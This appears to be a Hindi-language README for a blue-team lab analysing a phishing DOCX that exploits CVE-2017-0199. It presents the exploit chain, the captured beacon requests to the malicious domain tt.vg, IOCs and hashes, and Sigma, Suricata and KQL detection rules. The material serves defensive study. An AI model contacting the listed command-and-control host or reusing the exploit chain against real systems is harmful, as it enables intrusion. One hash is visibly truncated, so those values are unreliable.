
इस रिपॉजिटरी में CVE-2017-0199 का शोषण करने वाले एक वास्तविक दुर्भावनापूर्ण DOCX का पूर्ण ब्लू-टीम मैलवेयर विश्लेषण शामिल है। प्रयोगशाला में सैंडबॉक्स निष्पादन, नेटवर्क फोरेंसिक, IOC निष्कर्षण, MITRE ATT&CK मैपिंग, ड्रॉप की गई फाइलों की समीक्षा और डिटेक्शन नियम शामिल हैं। पेशेवर दस्तावेज़ीकरण के लिए साक्ष्य स्क्रीनशॉट evidence फ़ोल्डर के अंदर शामिल हैं।
उन्नत मैलवेयर डेटोनेशन • एक्सप्लॉइट व्यवहार • IOC • डिटेक्शन इंजीनियरिंग
यह रिपॉजिटरी **CVE-2017-0199** Microsoft Office RCE कमजोरी का शोषण करने वाली एक **वास्तविक दुर्भावनापूर्ण DOCX** फ़ाइल का दस्तावेज़ीकरण करती है। इस सैंपल को **Windows 10 ANY.RUN सैंडबॉक्स** के अंदर डेटोनेट किया गया था, जिससे सामने आए:
✔ पूर्ण एक्सप्लॉइट श्रृंखला
✔ दुर्भावनापूर्ण डोमेन (tt.vg) पर नेटवर्क कॉलबैक
✔ ड्रॉप की गई फ़ाइलें और अस्थायी आर्टिफैक्ट
✔ JA3 फिंगरप्रिंट
✔ रजिस्ट्री गतिविधि
✔ WINWORD.EXE से HTTP/HTTPS बीकनिंग
✔ संपूर्ण ब्लू-टीम IOC और डिटेक्शन नियम
“BankPaymAdviceVend.Report.docx” शीर्षक वाला एक दस्तावेज़ फ़िशिंग ईमेल के माध्यम से प्राप्त हुआ था।
एक बार डेटोनेट होने पर, ANY.RUN ने तुरंत इसे दुर्भावनापूर्ण (Malicious) के रूप में चिह्नित किया और इसे निम्नलिखित से जोड़ा:
tt.vg से संपर्क करना/BVhaS को पुनर्प्राप्त करने का प्रयास
[ दुर्भावनापूर्ण DOCX ] │ ▼ [ उपयोगकर्ता Word में खोलता है ] │ ▼ [ CVE-2017-0199 एक्सप्लॉइट ट्रिगर होता है ] │ ▼ [ WINWORD.EXE → tt.vg HTTP/HTTPS के माध्यम से ] │ ▼ [ रिमोट पथ: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ अस्थायी फ़ाइलें, EMF ऑब्जेक्ट, कैश फ़ाइलें ड्रॉप हुईं ] │ ▼ [ संभावित अगला चरण पेलोड — सर्वर ने 404 लौटाया ]
yaml Copy code
केवल एक डोमेन दुर्भावनापूर्ण था:
| डोमेन | प्रतिष्ठा |
|---|---|
| tt.vg | 🔴 दुर्भावनापूर्ण |
रिज़ॉल्व किए गए IP:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml Copy code
Word ने फ़ेच करने का प्रयास किया:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof
yaml Copy code
विशिष्ट कैप्चर किया गया अनुरोध:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino Copy code
सर्वर ने जवाब दिया:
HTTP/1.1 404 Not Found
yaml Copy code
.tmp फ़ाइलें.glox ग्राफ़िक ऑब्जेक्ट%LOCALAPPDATA%\INetCache\Content.MSO\*.emf.LNKindex.dat लॉगWord ने एक्सेस किया:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml Copy code
✔ Office के लिए सामान्य
❌ एक्सप्लॉइट के साथ संयुक्त = स्पष्ट दुर्भावनापूर्ण व्यवहार
प्रकार: रिमोट कोड निष्पादन (Remote Code Execution)
ट्रिगर: दुर्भावनापूर्ण DOCX उपयोगकर्ता इंटरैक्शन के बिना रिमोट HTA लोड करता है
परिचय: Microsoft Word 2007–2016
प्रभाव: हमलावर मनमाना कोड निष्पादित करता है
यह सैंपल निम्न से रिमोट पेलोड लोड करने का प्रयास करता है:
yaml Copy code
डोमेन: tt.vg
URL: http://tt.vg/BVhaS https://tt.vg/BVhaS
IP: 188.114.96.3 188.114.97.3 172.67.138.42
shell Copy code
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml Copy code
यह अनुभाग BankPaymAdviceVend.Report.docx के तकनीकी विश्लेषण को व्यावहारिक, प्रोडक्शन-तैयार डिटेक्शन आर्टिफैक्ट में परिवर्तित करता है, जिन्हें SOC या ब्लू टीम तुरंत तैनात कर सकती है। इसमें Sigma नियम, Suricata IDS सिग्नेचर, और EDR हंटिंग क्वेरी शामिल हैं।
यह Sigma नियम Windows नेटवर्क लॉग में WINWORD.EXE द्वारा
संदिग्ध शॉर्ट डोमेन tt.vg की ओर शुरू किए गए किसी भी नेटवर्क कनेक्शन का पता लगाता है।
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 कोई भी पुराना Office सिस्टम जो WINWORD.EXE के माध्यम से tt.vg से संपर्क करता है,
उसे तत्काल जांच शुरू करनी चाहिए।
/BVhaS
एक Suricata IDS नियम जो दुर्भावनापूर्ण डोमेन tt.vg पर
GET /BVhaS के लिए Office-उत्पन्न अनुरोध की पहचान करता है।
यह एक्सप्लॉइट के पेलोड पुनर्प्राप्ति प्रयास को पकड़ता है।
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 बाहरी ट्रैफ़िक की निगरानी के लिए Suricata या Zeek का उपयोग करने वाले वातावरणों में अत्यधिक प्रभावी।
एक KQL (Microsoft Defender) हंटिंग क्वेरी जिसका उपयोग वातावरण में किसी भी मशीन की पहचान करने के लिए किया जाता है
जो tt.vg या उससे संबंधित IP पतों पर समान दुर्भावनापूर्ण बीकनिंग दिखाती है।
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 उद्देश्य: एकल सैंडबॉक्स डेटोनेशन को पूर्ण एंटरप्राइज़-व्यापी हंट में विस्तारित करना।
यह लैब वास्तविक दुनिया के फ़िशिंग DOCX सैंपल का अंत-से-अंत (end-to-end) विश्लेषण करने की आपकी क्षमता को प्रदर्शित करती है, जो एक संपूर्ण SOC-ग्रेड पद्धति का पालन करती है:
WINWORD.EXE कैसे एक अप्रत्याशित HTTP/S क्लाइंट बन जाता है।दूसरे शब्दों में — यह लैब डेटोनेशन पर नहीं रुकती। यह एक पेशेवर SOC विश्लेषक की तरह वास्तविक, कार्रवाई योग्य डिटेक्शन इंटेलिजेंस निकालती है।
अहमद तारिक द्वारा डिज़ाइन और दस्तावेज़ीकृत — ब्लू टीम
| फ़ील्ड | मान |
|---|
| फ़ाइल | BankPaymAdviceVend.Report.docx |
| निर्णय | दुर्भावनापूर्ण गतिविधि |
| टैग | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| सैंडबॉक्स | Windows 10 Pro x64 |
| व्यवहार | एक्सप्लॉइट → नेटवर्क बीकनिंग → ड्रॉप की गई फ़ाइलें |